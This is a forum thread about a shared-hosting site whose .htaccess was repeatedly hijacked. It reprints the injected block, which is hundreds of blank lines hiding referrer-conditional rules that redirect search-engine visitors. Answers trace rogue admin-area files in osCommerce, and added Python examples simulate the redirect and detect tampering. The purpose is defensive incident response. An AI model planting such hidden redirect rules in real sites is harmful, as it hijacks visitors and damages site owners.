.htaccess being hacked repeatedly [duplicate]

About 4 or 5 days ago, a client came back to me saying that their site was being redirected to some other suspicious looking website from Google, Yahoo, etc., but it was working fine when the user enters the site URL in the browser address bar directly.

I tried contacting my hosting provider, but they were of little to no help at first, and then seemed to take forever to find out what the problem was.

Frustrated by the wait, I set out to find what had happened. After a little bit of trawling on Google for solutions, I found out that my .htaccess file had been hacked.

What was:

<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>

had become

<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
//several hundred empty lines later
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ /*don't want to post the malicious URL here for fear of retaliation */[R=301,L]

Basically, the bot that hacked me seemed to write directions that all traffic coming from the important sites be redirected to the virus site.

I immediately fixed it by removing the offensive code, and felt very nice about my clever self. I also removed the .htaccess file from the main folder that is accessed by the public, and kept it one folder above, at the root. I also changed the permissions to 444, read only by anyone. I changed the passwords to my FTP access, my hosting control panel, MySQL databases, et al.

However, today the issue was back. Turns out that a NEW .htaccess file had been installed in my public_html folder, and this had only the offensive code I wrote above and nothing else.

What's going on?

I have a feeling that this is not a case of my passwords being compromised. I'm on shared hosting, and maybe someone on the same hard disk wrote a piece of code that went about writing .htaccess files merrily to all its neighbors. Is this possible? And is there anything I can do to make sure this does not happen again?

There is no way I can reinstall or do anything to the main OS of the host though...
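The redirect logic in the injected block, simulated offline as an added example (this is not code from the question or from anyone in this thread). It re-implements just enough of mod_rewrite's RewriteCond/RewriteRule evaluation to show why a direct visit (no Referer header) is served normally while a click from a search engine is sent elsewhere. It assumes a subset of the posted conditions and substitutes the placeholder http://redirect-target.invalid/ for the withheld target (.invalid is a reserved TLD).

```python
"""Simulate the referrer-conditional redirect from the hijacked .htaccess.

Added example, not code from the question. Assumptions: the rule text below
is a subset of the one posted in the question, and the withheld target is
replaced by the placeholder http://redirect-target.invalid/.
"""
import re

# Constructed from the posted rules: a handful of the [OR]-chained conditions.
INJECTED_RULES = """
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://redirect-target.invalid/ [R=301,L]
"""

COND_RE = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?$")
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?$")


def parse_referer_redirects(text):
    """Return [(conditions, target)] for each RewriteRule guarded by
    HTTP_REFERER conditions. A condition is (compiled_regex, negated, or_flag).
    RewriteCond lines on other variables are ignored in this demonstration."""
    rules, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = COND_RE.match(line)
        if m:
            pattern, flags = m.group(1), m.group(2) or ""
            negated = pattern.startswith("!")
            if negated:
                pattern = pattern[1:]
            flagset = {f.strip().upper() for f in flags.split(",") if f.strip()}
            # Apache treats the pattern as an unanchored, case-sensitive regex
            # unless the [NC] flag is present.
            regex = re.compile(pattern, re.IGNORECASE if "NC" in flagset else 0)
            pending.append((regex, negated, "OR" in flagset))
            continue
        m = RULE_RE.match(line)
        if m and pending:
            rules.append((pending, m.group(2)))
            pending = []
    return rules


def conditions_match(conditions, referer):
    """mod_rewrite semantics: conditions AND together by default; [OR] joins a
    condition with the next one, so "A [OR] B, C" means (A or B) and C."""
    groups, current = [], []
    for regex, negated, or_flag in conditions:
        current.append((regex, negated))
        if not or_flag:
            groups.append(current)
            current = []
    if current:
        groups.append(current)
    return all(
        any((regex.search(referer) is not None) != negated for regex, negated in group)
        for group in groups
    )


def redirect_target(rules, referer):
    """Target the first firing rule sends the client to, or None to serve the
    page normally. A missing Referer header is the empty string, as Apache sees it."""
    referer = referer or ""
    for conditions, target in rules:
        if conditions_match(conditions, referer):
            return target
    return None


RULES = parse_referer_redirects(INJECTED_RULES)

if __name__ == "__main__":
    for ref in ("", "https://www.google.com/search?q=client+site",
                "https://www.oliveoil.example/recipes", "https://example.org/"):
        print(repr(ref), "->", redirect_target(RULES, ref))
```

Two things the simulation makes visible. The patterns are unanchored substrings, so `.*live.*` or `.*ya.*` fire on any referring page whose URL happens to contain those letters (a link from a hypothetical oliveoil.example site is redirected too), which is why victims who only ever open the site by typing the address never see the problem. And the rule answers with a 301, which browsers may cache, so a user who arrived once via a search result can keep landing on the target even after the .htaccess is cleaned.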


Solution 1:

Your site has been hacked. You need to wipe it and restore from a known-good backup. Keep a copy of the hacked site and its logs so that you can compare it to the good site and try to figure out how the site was compromised.

Solution 2:

I found the roaches!

I did everything, including changing FTP password, hosting panel password, (painfully) wiping the whole 2GB and going through uploading it all back up, and changing database password.

They still got in.

The FTP logs showed nothing but my own actions. On top of that, the .htaccess file's last-modified timestamp was exactly the same as my timestamp (whenever I corrected it from its repeated perversion), so there was no way to know when and how modifications took place. I guessed they were using filemtime() and touch() to do that.

It turns out the rogue files are getting in through an osCommerce installation. I do not know how, but specifically, it's getting through the administration area. In the admin folders, there are these foreign files called "google_analitis(sic)_somenumber". I noticed them on my main stats reader. I just looked at all the files that were being accessed (the normal logs) today, and by luck, the file got hacked again just today. I suspected there was a rogue script and, lo and behold, these files have the spammer-stink written all over their filenames.

I opened them up and sure enough, they were up to a lot of mischief.

I just opened one of the files using the URL, and I was really surprised the amount of control these files were providing... it was a parallel control panel to the entire website!

Hope this helps someone... look at your third party apps, especially when you see a large number of unknown bots crawling up and down your site.
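Two checks that follow from the two answers, as an added example (not code from the thread or from osCommerce): Solution 1's advice to keep the hacked copy and compare it with a known-good one, and Solution 2's suspicion that touch()/filemtime() were used to hide when .htaccess changed. touch() can set a file's mtime, but on Linux/POSIX filesystems the inode change time (ctime) is maintained by the kernel and cannot be set from userland, so an mtime far older than the ctime is a lead. The sample tree, the rogue filename and the placeholder redirect target are constructed here to mirror the thread's description; the check assumes a POSIX filesystem (on Windows st_ctime is the creation time and the second check does not apply).

```python
"""Post-compromise triage helpers for a shared-hosting web root.

Added example, not code from the thread. Assumptions: POSIX filesystem
(ctime is the inode change time), and a constructed sample tree that mirrors
what the thread describes: a dropped file in the admin area and a
referrer-conditional redirect appended to .htaccess with a placeholder target.
"""
import hashlib
import os
import tempfile
import time
from pathlib import Path


def hash_tree(root):
    """{relative path: sha256 hex} for every regular file under root."""
    root = Path(root)
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_manifest(clean, live):
    """Compare two manifests from hash_tree(); returns sorted lists."""
    return {
        "added": sorted(set(live) - set(clean)),
        "removed": sorted(set(clean) - set(live)),
        "modified": sorted(k for k in clean.keys() & live.keys() if clean[k] != live[k]),
    }


def backdated_files(root, tolerance=60):
    """Files whose ctime is more than `tolerance` seconds newer than mtime.
    Caveat: chmod/chown/rename also bump ctime, so a file you chmodded to 444
    after editing shows up too; treat hits as leads, not verdicts."""
    root = Path(root)
    hits = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            st = p.stat()
            if st.st_ctime - st.st_mtime > tolerance:
                hits.append(str(p.relative_to(root)))
    return hits


def run_demo():
    """Build a clean copy and a 'live' copy, tamper with the live one the way
    the thread describes, and return what the two checks report."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for base in (clean, live):
            (base / "admin").mkdir(parents=True)
            (base / ".htaccess").write_text("Header set Pragma: no-cache\n")
            (base / "admin" / "login.php").write_text("<?php // admin login stub\n")
        manifest = hash_tree(clean)  # what you would keep from the known-good backup

        # Constructed tampering: rogue file name modelled on the thread's
        # "google_analitis_<number>", and a redirect with a placeholder target
        # (.invalid is a reserved TLD).
        (live / "admin" / "google_analitis_1234.php").write_text(
            "<?php /* constructed stand-in for the rogue file */ ?>\n")
        ht = live / ".htaccess"
        ht.write_text(ht.read_text()
                      + "RewriteEngine On\n"
                      + "RewriteCond %{HTTP_REFERER} .*google.*\n"
                      + "RewriteRule ^(.*)$ http://redirect-target.invalid/ [R=301,L]\n")
        # What touch() achieves: mtime pushed back a day while ctime moves to now.
        a_day_ago = time.time() - 86400
        os.utime(ht, (a_day_ago, a_day_ago))

        return {"diff": diff_manifest(manifest, hash_tree(live)),
                "backdated": backdated_files(live)}


if __name__ == "__main__":
    report = run_demo()
    print("added:", report["diff"]["added"])
    print("modified:", report["diff"]["modified"])
    print("backdated mtime:", report["backdated"])
```

In practice you would run hash_tree() once against the restored known-good tree, store the manifest off the server, and re-run diff_manifest() against the live tree on a schedule; anything under admin/ that appears in "added" deserves the same look the poster gave the google_analitis files. Neither check finds the entry point, which in this thread was the osCommerce admin area; they only shorten the time between reinfection and noticing it.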